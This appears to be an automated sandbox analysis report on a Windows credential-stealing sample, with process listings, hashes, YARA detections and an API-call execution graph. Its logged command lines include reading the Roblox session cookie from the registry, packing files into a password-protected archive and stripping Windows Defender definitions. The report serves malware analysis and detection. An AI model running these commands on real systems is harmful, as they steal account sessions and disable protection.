                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                                                                                        Imagebase:0x7ff650120000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:91
                                                                                                                                                                                                                                        Start time:16:11:00
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:92
                                                                                                                                                                                                                                        Start time:16:11:00
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                                                                        Imagebase:0x7ff7be880000
                                                                                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:93
                                                                                                                                                                                                                                        Start time:16:11:02
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exe"
                                                                                                                                                                                                                                        Imagebase:0xbe0000
                                                                                                                                                                                                                                        File size:776'832 bytes
                                                                                                                                                                                                                                        MD5 hash:AFD936E441BF5CBDB858E96833CC6ED3
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                        • Detection: 68%, ReversingLabs
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:94
                                                                                                                                                                                                                                        Start time:16:11:02
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:95
                                                                                                                                                                                                                                        Start time:16:11:08
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exe"
                                                                                                                                                                                                                                        Imagebase:0xbe0000
                                                                                                                                                                                                                                        File size:776'832 bytes
                                                                                                                                                                                                                                        MD5 hash:AFD936E441BF5CBDB858E96833CC6ED3
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000005F.00000003.2934600615.0000000001328000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000005F.00000003.2934892594.00000000012D9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000005F.00000003.2960705475.00000000012D9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:96
                                                                                                                                                                                                                                        Start time:16:11:10
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe"
                                                                                                                                                                                                                                        Imagebase:0xa00000
                                                                                                                                                                                                                                        File size:1'885'696 bytes
                                                                                                                                                                                                                                        MD5 hash:25FB9C54265BBACC7A055174479F0B70
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                        • Detection: 75%, ReversingLabs
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:97
                                                                                                                                                                                                                                        Start time:16:11:13
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI51602\rar.exe a -r -hp"yeezy222" "C:\Users\user\AppData\Local\Temp\vLqBW.zip" *"
                                                                                                                                                                                                                                        Imagebase:0x7ff650120000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:98
                                                                                                                                                                                                                                        Start time:16:11:13
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6a5670000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:99
                                                                                                                                                                                                                                        Start time:16:11:13
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\_MEI51602\rar.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\_MEI51602\rar.exe a -r -hp"yeezy222" "C:\Users\user\AppData\Local\Temp\vLqBW.zip" *
                                                                                                                                                                                                                                        Imagebase:0x7ff62b130000
                                                                                                                                                                                                                                        File size:630'736 bytes
                                                                                                                                                                                                                                        MD5 hash:9C223575AE5B9544BC3D69AC6364F75E
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:100
                                                                                                                                                                                                                                        Start time:16:11:16
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                                                                                                                                                                                                                                        Imagebase:0x7ff781f50000
                                                                                                                                                                                                                                        File size:468'120 bytes
                                                                                                                                                                                                                                        MD5 hash:B3676839B2EE96983F9ED735CD044159
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:101
                                                                                                                                                                                                                                        Start time:16:11:17
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                                                                                                                                                                                        Imagebase:0x7ff650120000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:102
                                                                                                                                                                                                                                        Start time:16:11:17
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:103
                                                                                                                                                                                                                                        Start time:16:11:17
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:wmic os get Caption
                                                                                                                                                                                                                                        Imagebase:0x7ff681f80000
                                                                                                                                                                                                                                        File size:576'000 bytes
                                                                                                                                                                                                                                        MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:109
                                                                                                                                                                                                                                        Start time:16:11:19
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:
                                                                                                                                                                                                                                        Has administrator privileges:
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        Disassembly

                                                                                                                                                                                                                                        Reset < >

                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                          Execution Coverage:4.4%
                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                          Signature Coverage:29.6%
                                                                                                                                                                                                                                          Total number of Nodes:724
                                                                                                                                                                                                                                          Total number of Limit Nodes:23
                                                                                                                                                                                                                                          execution_graph 10611 296629 10614 2964c7 10611->10614 10616 2964d5 10614->10616 10615 296520 10616->10615 10619 29652b 10616->10619 10618 29652a 10625 29a302 GetPEB 10619->10625 10621 296535 10622 29653a GetPEB 10621->10622 10624 29654a 10621->10624 10622->10624 10623 296562 ExitProcess 10624->10623 10626 29a31c 10625->10626 10626->10621 10654 261c20 10655 261c31 10654->10655 10658 27d64e 10655->10658 10661 27d621 10658->10661 10662 27d637 10661->10662 10663 27d630 10661->10663 10670 2998fa 10662->10670 10667 29988e 10663->10667 10666 261c3b 10668 2998fa RtlAllocateHeap 10667->10668 10669 2998a0 10668->10669 10669->10666 10673 299630 10670->10673 10672 29992b 10672->10666 10674 29963c ___std_exception_copy 10673->10674 10677 29968b 10674->10677 10676 299657 10676->10672 10678 2996a7 10677->10678 10679 299714 __freea 10677->10679 10678->10679 10682 2996f4 __freea 10678->10682 10683 29edf6 10678->10683 10679->10676 10681 29edf6 RtlAllocateHeap 10681->10679 10682->10679 10682->10681 10684 29ee03 10683->10684 10686 29ee0f ___std_exception_copy 10684->10686 10687 2a500f 10684->10687 10686->10682 10688 2a501c 10687->10688 10690 2a5024 __freea ___std_exception_copy 10687->10690 10689 29b04b RtlAllocateHeap 10688->10689 10689->10690 10690->10686 11036 264120 11037 26416a 11036->11037 11039 2641b2 std::invalid_argument::invalid_argument 11037->11039 11040 263ee0 11037->11040 11041 263f1e 11040->11041 11042 263f48 11040->11042 11041->11039 11043 263f58 11042->11043 11046 262c00 11042->11046 11043->11039 11047 262c0e 11046->11047 11053 27b847 11047->11053 11049 262c42 11050 262c49 11049->11050 11059 262c80 11049->11059 11050->11039 11052 262c58 Concurrency::cancel_current_task 11054 27b854 11053->11054 11058 27b873 Concurrency::details::_Reschedule_chore 11053->11058 11062 27cb77 11054->11062 11056 27b864 11056->11058 11064 27b81e 11056->11064 11058->11049 11070 27b7fb 11059->11070 11061 262cb2 shared_ptr 11061->11052 11063 27cb92 CreateThreadpoolWork 11062->11063 11063->11056 11065 27b827 Concurrency::details::_Reschedule_chore 11064->11065 11068 27cdcc 11065->11068 11067 27b841 11067->11058 11069 27cde1 TpPostWork 11068->11069 11069->11067 11071 27b807 11070->11071 11072 27b817 11070->11072 11071->11072 11074 27ca78 11071->11074 11072->11061 11075 27ca8d TpReleaseWork 11074->11075 11075->11072 10698 261020 10699 261031 10698->10699 10700 27d64e RtlAllocateHeap 10699->10700 10701 26103b 10700->10701 10706 268437 10707 268439 10706->10707 10708 265c10 3 API calls 10707->10708 10709 268454 shared_ptr std::invalid_argument::invalid_argument 10708->10709 11289 262e00 11290 262e28 11289->11290 11291 27c68b __Mtx_init_in_situ 2 API calls 11290->11291 11292 262e33 11291->11292 10721 261000 10722 27d64e RtlAllocateHeap 10721->10722 10723 26100a 10722->10723 11305 266e14 11306 266e16 shared_ptr ___std_exception_copy 11305->11306 11307 298ab6 RtlAllocateHeap 11306->11307 11308 266ec1 shared_ptr std::invalid_argument::invalid_argument 11306->11308 11307->11308 11511 262b10 11512 262b1c 11511->11512 11513 262b1a 11511->11513 11514 27c26a 4 API calls 11512->11514 11515 262b22 11514->11515 11325 264276 11326 262410 4 API calls 11325->11326 11327 26427f 11326->11327 11131 262170 11136 27c6fc 11131->11136 11134 27d64e RtlAllocateHeap 11135 262184 11134->11135 11137 26217a 11136->11137 11138 27c70c 11136->11138 11137->11134 11138->11137 11140 27cfbe 11138->11140 11141 27ccd5 __Mtx_init_in_situ InitializeCriticalSectionEx 11140->11141 11142 27cfd0 11141->11142 11142->11138 10765 263c47 10766 263c51 10765->10766 10768 263c5f 10766->10768 10769 2632d0 10766->10769 10788 27c6ac 10769->10788 10771 26336b 10794 27c26a 10771->10794 10774 26333c __Mtx_unlock 10775 27c26a 4 API calls 10774->10775 10778 263350 std::invalid_argument::invalid_argument 10774->10778 10776 263377 10775->10776 10779 27c6ac GetSystemTimePreciseAsFileTime 10776->10779 10777 263314 10777->10771 10777->10774 10791 27bd4c 10777->10791 10778->10768 10780 2633af 10779->10780 10781 27c26a 4 API calls 10780->10781 10782 2633b6 __Cnd_broadcast 10780->10782 10781->10782 10783 27c26a 4 API calls 10782->10783 10784 2633d7 __Mtx_unlock 10782->10784 10783->10784 10785 27c26a 4 API calls 10784->10785 10786 2633eb 10784->10786 10787 26340e 10785->10787 10786->10768 10787->10768 10801 27c452 10788->10801 10790 27c6b9 10790->10777 10818 27bb72 10791->10818 10793 27bd5c 10793->10777 10795 27c274 10794->10795 10796 27c292 ___std_exception_copy 10794->10796 10795->10796 10797 27c283 10795->10797 10827 2965ed 10796->10827 10824 27c297 10797->10824 10802 27c4a8 10801->10802 10804 27c47a std::invalid_argument::invalid_argument 10801->10804 10802->10804 10807 27cf6b 10802->10807 10804->10790 10805 27c4fd __Xtime_diff_to_millis2 10805->10804 10806 27cf6b _xtime_get GetSystemTimePreciseAsFileTime 10805->10806 10806->10805 10808 27cf7a 10807->10808 10809 27cf87 __aulldvrm 10807->10809 10808->10809 10811 27cf44 10808->10811 10809->10805 10814 27cbea 10811->10814 10815 27cbfb GetSystemTimePreciseAsFileTime 10814->10815 10817 27cc07 10814->10817 10815->10817 10817->10809 10819 27bb9c 10818->10819 10820 27cf6b _xtime_get GetSystemTimePreciseAsFileTime 10819->10820 10823 27bba4 __Xtime_diff_to_millis2 std::invalid_argument::invalid_argument 10819->10823 10821 27bbcf __Xtime_diff_to_millis2 10820->10821 10822 27cf6b _xtime_get GetSystemTimePreciseAsFileTime 10821->10822 10821->10823 10822->10823 10823->10793 10830 262ae0 10824->10830 10826 27c2ae Concurrency::cancel_current_task 10828 2964c7 3 API calls 10827->10828 10829 2965fe 10828->10829 10833 27bedf 10830->10833 10832 262af4 ___std_exception_copy 10832->10826 10836 27cc31 10833->10836 10837 27cc3f InitOnceExecuteOnce 10836->10837 10839 27bef2 10836->10839 10837->10839 10839->10832 10627 29b04b 10629 29b087 ___std_exception_copy 10627->10629 10630 29b059 ___std_exception_copy 10627->10630 10628 29b074 RtlAllocateHeap 10628->10629 10628->10630 10630->10628 10630->10629 11532 269f44 11533 269f4c shared_ptr 11532->11533 11534 26a953 Sleep CreateMutexA 11533->11534 11536 26a01f shared_ptr 11533->11536 11535 26a98e 11534->11535 11344 296a44 11345 296a5c 11344->11345 11346 296a52 11344->11346 11349 2968ed 11345->11349 11348 296a83 __freea 11352 29683b 11349->11352 11351 296905 11351->11348 11353 296849 ___std_exception_copy 11352->11353 11354 296863 11352->11354 11353->11351 11355 29686a 11354->11355 11357 296889 11354->11357 11355->11353 11359 2969e6 11355->11359 11357->11353 11358 2969e6 RtlAllocateHeap 11357->11358 11358->11353 11360 2969f4 11359->11360 11363 296a25 11360->11363 11364 29b04b RtlAllocateHeap 11363->11364 11365 296a05 11364->11365 11365->11353 10499 26a856 10500 26a870 10499->10500 10505 26a892 shared_ptr 10499->10505 10504 26a94e 10500->10504 10500->10505 10501 26a8a0 10503 26a953 Sleep CreateMutexA 10508 26a98e 10503->10508 10504->10503 10505->10501 10515 267d30 10505->10515 10506 26a8ae 10506->10501 10507 267d30 4 API calls 10506->10507 10509 26a8b8 10507->10509 10509->10501 10510 267d30 4 API calls 10509->10510 10511 26a8c2 10510->10511 10511->10501 10512 267d30 4 API calls 10511->10512 10513 26a8cc 10512->10513 10513->10501 10514 267d30 4 API calls 10513->10514 10514->10501 10516 267d96 ___std_exception_copy 10515->10516 10542 267ee8 shared_ptr std::invalid_argument::invalid_argument 10516->10542 10558 265c10 10516->10558 10518 267dd2 10519 265c10 3 API calls 10518->10519 10521 267dff shared_ptr 10519->10521 10520 267ed3 GetNativeSystemInfo 10522 267ed7 10520->10522 10521->10520 10521->10522 10528 267fb1 ___std_exception_copy 10521->10528 10523 267f3f 10522->10523 10524 268019 10522->10524 10522->10542 10526 265c10 3 API calls 10523->10526 10525 265c10 3 API calls 10524->10525 10527 26804c 10525->10527 10529 267f67 10526->10529 10530 265c10 3 API calls 10527->10530 10531 265c10 3 API calls 10528->10531 10528->10542 10532 265c10 3 API calls 10529->10532 10535 26806b 10530->10535 10533 268427 10531->10533 10534 267f86 10532->10534 10536 265c10 3 API calls 10533->10536 10575 298bbe 10534->10575 10538 265c10 3 API calls 10535->10538 10536->10542 10539 2680a3 10538->10539 10540 265c10 3 API calls 10539->10540 10541 2680f4 10540->10541 10543 265c10 3 API calls 10541->10543 10542->10506 10544 268113 10543->10544 10545 265c10 3 API calls 10544->10545 10546 26814b 10545->10546 10547 265c10 3 API calls 10546->10547 10548 26819c 10547->10548 10549 265c10 3 API calls 10548->10549 10550 2681bb 10549->10550 10551 265c10 3 API calls 10550->10551 10552 2681f3 10551->10552 10553 265c10 3 API calls 10552->10553 10554 268244 10553->10554 10555 265c10 3 API calls 10554->10555 10556 268263 10555->10556 10557 265c10 3 API calls 10556->10557 10557->10542 10559 265c54 10558->10559 10578 264b30 10559->10578 10561 265d17 shared_ptr std::invalid_argument::invalid_argument 10561->10518 10562 265c7b ___std_exception_copy 10562->10561 10563 265da7 RegOpenKeyExA 10562->10563 10564 265e00 RegCloseKey 10563->10564 10566 265e26 10564->10566 10565 265ea6 shared_ptr std::invalid_argument::invalid_argument 10565->10518 10566->10565 10567 265c10 RtlAllocateHeap 10566->10567 10568 2666ac 10567->10568 10569 265c10 RtlAllocateHeap 10568->10569 10570 2666b1 shared_ptr 10569->10570 10571 265c10 RtlAllocateHeap 10570->10571 10574 266852 shared_ptr std::invalid_argument::invalid_argument 10570->10574 10573 26673d shared_ptr 10571->10573 10572 265c10 RtlAllocateHeap 10572->10573 10573->10572 10573->10574 10574->10518 10607 298868 10575->10607 10577 298bdc 10577->10528 10580 264ce5 10578->10580 10581 264b92 10578->10581 10580->10562 10581->10580 10582 296da6 10581->10582 10583 296dc2 10582->10583 10584 296db4 10582->10584 10583->10581 10587 296d19 10584->10587 10588 296d2c 10587->10588 10591 296d52 10588->10591 10590 296d3d 10590->10581 10592 296d6e 10591->10592 10593 296d5f 10591->10593 10592->10590 10593->10592 10595 29b6a1 10593->10595 10596 29b6be 10595->10596 10598 29b6ce std::invalid_argument::invalid_argument 10596->10598 10599 29f1bf 10596->10599 10598->10592 10600 29f1df 10599->10600 10602 29f232 __freea ___std_exception_copy std::invalid_argument::invalid_argument 10600->10602 10603 29b04b 10600->10603 10602->10598 10605 29b087 ___std_exception_copy 10603->10605 10606 29b059 ___std_exception_copy 10603->10606 10604 29b074 RtlAllocateHeap 10604->10605 10604->10606 10605->10602 10606->10604 10606->10605 10608 29887a 10607->10608 10609 296d52 RtlAllocateHeap 10608->10609 10610 29888f ___std_exception_copy 10608->10610 10609->10608 10610->10577 11167 26215a 11168 27c6fc InitializeCriticalSectionEx 11167->11168 11169 262164 11168->11169 11170 27d64e RtlAllocateHeap 11169->11170 11171 26216e 11170->11171 11558 26735a 11560 267368 shared_ptr 11558->11560 11559 267400 shared_ptr std::invalid_argument::invalid_argument 11560->11559 11567 26765e shared_ptr 11560->11567 11625 27d111 11560->11625 11563 27d64e RtlAllocateHeap 11564 267654 11563->11564 11629 27d0c7 11564->11629 11566 26777f shared_ptr 11567->11566 11568 265c10 3 API calls 11567->11568 11570 267883 shared_ptr 11567->11570 11568->11570 11569 265c10 3 API calls 11572 2679e3 11569->11572 11570->11569 11571 267953 shared_ptr std::invalid_argument::invalid_argument 11570->11571 11573 265c10 3 API calls 11572->11573 11575 267a15 shared_ptr 11573->11575 11574 267aa5 shared_ptr std::invalid_argument::invalid_argument 11575->11574 11633 266d70 11575->11633 11577 267b1b shared_ptr 11578 265c10 3 API calls 11577->11578 11582 267be3 shared_ptr ___std_exception_copy 11577->11582 11579 267b7d 11578->11579 11580 265c10 3 API calls 11579->11580 11581 267ba0 11580->11581 11583 265c10 3 API calls 11581->11583 11584 265c10 3 API calls 11582->11584 11587 267cf4 shared_ptr std::invalid_argument::invalid_argument 11582->11587 11583->11582 11585 267dd2 11584->11585 11586 265c10 3 API calls 11585->11586 11589 267dff shared_ptr 11586->11589 11588 267ed3 GetNativeSystemInfo 11590 267ed7 11588->11590 11589->11588 11589->11590 11597 267fb1 ___std_exception_copy 11589->11597 11590->11587 11591 267f3f 11590->11591 11592 268019 11590->11592 11594 265c10 3 API calls 11591->11594 11593 265c10 3 API calls 11592->11593 11595 26804c 11593->11595 11596 267f67 11594->11596 11598 265c10 3 API calls 11595->11598 11600 265c10 3 API calls 11596->11600 11597->11587 11599 265c10 3 API calls 11597->11599 11603 26806b 11598->11603 11601 268427 11599->11601 11602 267f86 11600->11602 11604 265c10 3 API calls 11601->11604 11605 298bbe RtlAllocateHeap 11602->11605 11606 265c10 3 API calls 11603->11606 11604->11587 11605->11597 11607 2680a3 11606->11607 11608 265c10 3 API calls 11607->11608 11609 2680f4 11608->11609 11610 265c10 3 API calls 11609->11610 11611 268113 11610->11611 11612 265c10 3 API calls 11611->11612 11613 26814b 11612->11613 11614 265c10 3 API calls 11613->11614 11615 26819c 11614->11615 11616 265c10 3 API calls 11615->11616 11617 2681bb 11616->11617 11618 265c10 3 API calls 11617->11618 11619 2681f3 11618->11619 11620 265c10 3 API calls 11619->11620 11621 268244 11620->11621 11622 265c10 3 API calls 11621->11622 11623 268263 11622->11623 11624 265c10 3 API calls 11623->11624 11624->11587 11627 27d122 11625->11627 11626 2675ed 11626->11563 11626->11567 11627->11626 11637 27d199 11627->11637 11631 27d0d7 11629->11631 11630 27d17f 11630->11567 11631->11630 11632 27d17b RtlWakeAllConditionVariable 11631->11632 11632->11567 11634 266db0 shared_ptr ___std_exception_copy 11633->11634 11635 298ab6 RtlAllocateHeap 11634->11635 11636 266ec1 shared_ptr std::invalid_argument::invalid_argument 11634->11636 11635->11636 11636->11577 11638 27d1a7 SleepConditionVariableCS 11637->11638 11640 27d1c0 11637->11640 11638->11640 11640->11627 11641 269ba5 11642 269ba7 11641->11642 11643 265c10 3 API calls 11642->11643 11644 269cb1 11643->11644 11645 268b30 3 API calls 11644->11645 11646 269cc2 11645->11646 10871 2620a0 10876 27c68b 10871->10876 10874 27d64e RtlAllocateHeap 10875 2620b6 10874->10875 10879 27c3d5 10876->10879 10878 2620ac 10878->10874 10880 27c3e1 10879->10880 10881 27c3eb 10879->10881 10882 27c3be 10880->10882 10883 27c39e 10880->10883 10881->10878 10892 27cd0a 10882->10892 10883->10881 10888 27ccd5 10883->10888 10886 27c3d0 10886->10878 10889 27cce3 InitializeCriticalSectionEx 10888->10889 10890 27c3b7 10888->10890 10889->10890 10890->10878 10893 27cd1f RtlInitializeConditionVariable 10892->10893 10893->10886 10650 26b1a0 10651 26b1f2 10650->10651 10652 26b3ad CoInitialize 10651->10652 10653 26b3fa shared_ptr std::invalid_argument::invalid_argument 10652->10653 10894 2670a0 10895 2670d2 ___std_exception_copy 10894->10895 10896 267243 std::invalid_argument::invalid_argument 10895->10896 10898 266ef0 10895->10898 10899 266f22 ___std_exception_copy 10898->10899 10901 266fd6 shared_ptr std::invalid_argument::invalid_argument 10899->10901 10902 298ab6 10899->10902 10901->10895 10903 298ad1 10902->10903 10904 298868 RtlAllocateHeap 10903->10904 10905 298adb 10904->10905 10905->10901 11663 267fa9 11664 267fab 11663->11664 11665 298bbe RtlAllocateHeap 11664->11665 11667 267fb1 ___std_exception_copy 11665->11667 11666 267ff2 shared_ptr std::invalid_argument::invalid_argument 11667->11666 11668 265c10 3 API calls 11667->11668 11669 268427 11668->11669 11670 265c10 3 API calls 11669->11670 11670->11666 10631 2687b2 10632 2687b6 10631->10632 10633 2687b8 GetFileAttributesA 10631->10633 10632->10633 10634 2687c4 10633->10634 11382 2642b0 11385 263ac0 11382->11385 11384 2642bb shared_ptr 11386 263af9 11385->11386 11387 2632d0 5 API calls 11386->11387 11388 263b39 